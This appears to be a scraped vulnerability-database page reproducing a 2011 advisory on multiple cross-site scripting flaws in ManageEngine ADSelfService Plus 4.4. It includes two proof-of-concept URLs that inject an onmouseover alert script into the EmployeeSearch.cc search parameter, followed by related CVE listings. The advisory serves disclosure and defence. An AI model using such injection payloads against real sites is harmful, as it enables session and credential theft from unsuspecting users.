Lucene search
Core SecurityEDB-ID:35331HistoryFeb 10, 2011 - 12:00 a.m.
ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities
2011-02-1000:00:00
Core Security
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/46331/info
ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29¶meterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search¶meterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29Related
nvd
nvd
CVE-2010-3274
2011-02-17 18:00:03
CVE-2011-5105
2012-08-23 20:55:02
cve
cve
CVE-2010-3274
2011-02-17 18:00:03
CVE-2011-5105
2012-08-23 20:55:02
openvas
openvas
prion
prion
Cross site scripting
2011-02-17 18:00:00
Cross site scripting
2012-08-23 20:55:00
cvelist
cvelist
CVE-2010-3274
2011-02-17 17:00:00
CVE-2011-5105
2012-08-23 20:00:00
nessus
nessus
ManageEngine ADSelfService EmployeeSearch.cc Multiple XSS
2011-12-08 00:00:00
securityvulns
securityvulns
packetstorm
packetstorm
Core Security Technologies Advisory 2011.0103
2011-02-10 00:00:00